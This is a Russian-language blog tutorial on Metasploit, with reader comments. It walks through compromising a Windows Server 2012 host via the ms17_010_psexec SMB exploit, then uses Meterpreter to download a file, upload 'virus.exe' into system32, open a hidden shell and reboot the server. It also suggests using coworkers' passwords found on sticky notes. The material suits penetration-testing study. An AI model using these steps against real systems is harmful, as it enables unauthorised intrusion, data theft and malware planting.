{"id":14276,"url":"\/distributions\/14276\/click?bit=1&hash=721b78297d313f451e61a17537482715c74771bae8c8ce438ed30c5ac3bb4196","title":"\u0418\u043d\u0432\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 \u043b\u044e\u0431\u043e\u0439 \u0442\u043e\u0432\u0430\u0440 \u0438\u043b\u0438 \u0443\u0441\u043b\u0443\u0433\u0443 \u0431\u0435\u0437 \u0431\u0438\u0440\u0436\u0438","buttonText":"","imageUuid":""}

Metasploit Framework: краткое практическое руководство

Дисклеймер:

Автор материала не несет ответственности, за действия совершенные читателями. Информация предоставлена исключительно в ознакомительных целях.

Metasploit представляет собой платформу для тестирования на проникновение, позволяет имитировать сетевые атаки, а также является средством создания и применения эксплойтов. На данный момент Metasploit приобретен компанией Rapid7 и имеет несколько версий:

— командная оболочка msfconole

— версия с web-интерфейсом Metasploit PRO.

Загрузить и установить Metasploit можно с официального сайта проекта:

https://metasploit.com/

Или Gitlab:

https://gitlab.com/kalilinux/packages/metasploit-framework

В этой статье я постараюсь полностью избежать теории и максимально коротко раскрыть практическую сторону Metasploit на примере проникновения в ОС Windows Server 2012.

Подготовим все необходимое

В качестве атакующей машины будет выступать компьютер под управлением ОС Kali, дистрибутив которой уже содержит Metasploit, нам остается только запустить сервис базы данных:

$sudo service postgresql start

Убедиться, что база данных прослушивает порт 5432 командой:

$ss -ant

Остается только инициализировать БД msf:

$sudo msfdb init

Теперь можно запускать msfconsole:

$msfconsole

Проверим статус БД:

msf5 >db_status

Если всё настроено верно, то мы получим примерно такой вывод:

[*] Connected to msf. Connection type: postgresql.

Сбор информации и атака

Для этой цели будем использовать сетевой сканнер nmap прямо из консоли msf. Как использовать nmap — это отдельная тема, останавливаться на ней сейчас я не буду, скажу только, что ip-адрес жертвы в этом примере нам известен, а ключ -sV даст больше информации об ОС, службах и открытых портах:

msf5 >nmap -sV 192.168.1.104

Antony_Allonsy

Для поиска эксплойтов используем команду search. Также искать эксплойты можно по названию, коду CVE, версии сервиса или на https://www.exploit-db.com/

Следующей командой ищем модули для работы с SMB:

msf5 >search smb

В выводе мы получим список всех известных на данный момент модулей для SMB. А также версию, код уязвимости и шансы на успех.

Выбор осуществляется командой use:

msf5 >use exploit/windows/smb/ms17_010_psexec

Для смены модуля используем команду use или для отмены команду back.

Теперь мы можем установить ip адрес жертвы и ввести команду exploit в msfconsole для выполнения выбранного модуля или просмотреть опции модуля командой show options.

Опции модуля устанавливаются командой set.

В моей компании половина сотрудников хранят свои пароли на стикерах, приклеенных к мониторам. А в компании, где я работал до этого, все логины и пароли лежали на общедоступном диске в одном документе. Поэтому если вам так же «повезло», как мне, используем социальную инженерию и зададим логин и пароль:

msf5 exploit(windows/smb/ms17_010_psexec)>set smbuser Ivanov_II

msf5 exploit(windows/smb/ms17_010_psexec)>set smbpass Qwerty123

Но в данном примере я задам только ip-адрес, в этом случае Metasploit будет пытаться войти в систему либо анонимно, либо используя словарь, адрес которого видно в опциях. Вводим:

msf5 exploit(windows/smb/ms17_010_psexec)>set rhost 192.168.1.104

И запустим выбраный модуль:

msf5 exploit(windows/smb/ms17_010_psexec)>exploit

Antony_Allonsy

Если все прошло успешно, то мы попадем в сессию Meterpreter.

Для наглядности протестируем несколько команд:

Попробуем скопировать данные себе на компьютер. Перемещаться по директориям можно стандартными командами Windows.

meterpreter>download info.txt

Antony_Allonsy

Скопируем файл на ПК жертвы:

meterpreter> upload virus.exe c:\\windows\\system32

Antony_Allonsy

Запустим командную строку:

meterpreter>execute -f cmd.exe -i -H

Antony_Allonsy

И отправим сервер на перезагрузку:

meterpreter>reboot

Antony_Allonsy

Более подробно о возможностях Metasploit и Meterpreter можно почитать в курсе от Offensive Security:

https://www.offensive-security.com/metasploit-unleashed/

Или в официальной документации:

https://metasploit.help.rapid7.com/docs

0
5 комментариев
Akhma Osmanov

Странная статья на vc, на хабре, пожалуйста, но тут мне кажется другое комьюнити

Ответить
Развернуть ветку
Antony Allonsy
Автор

Вполне может быть. Меня сбило с толку слово "технологии" в описании этого ресурса.

Ответить
Развернуть ветку
Анастасия Старинская

Почему? Что тут вообще могло смутить?

Ответить
Развернуть ветку
Antony Allonsy
Автор

Потому что самое страшное, что может случится - это перепутать комьюнити, для которого ты пишешь.

Ответить
Развернуть ветку
Панда Ву

Вам на хабр

Ответить
Развернуть ветку
2 комментария
Раскрывать всегда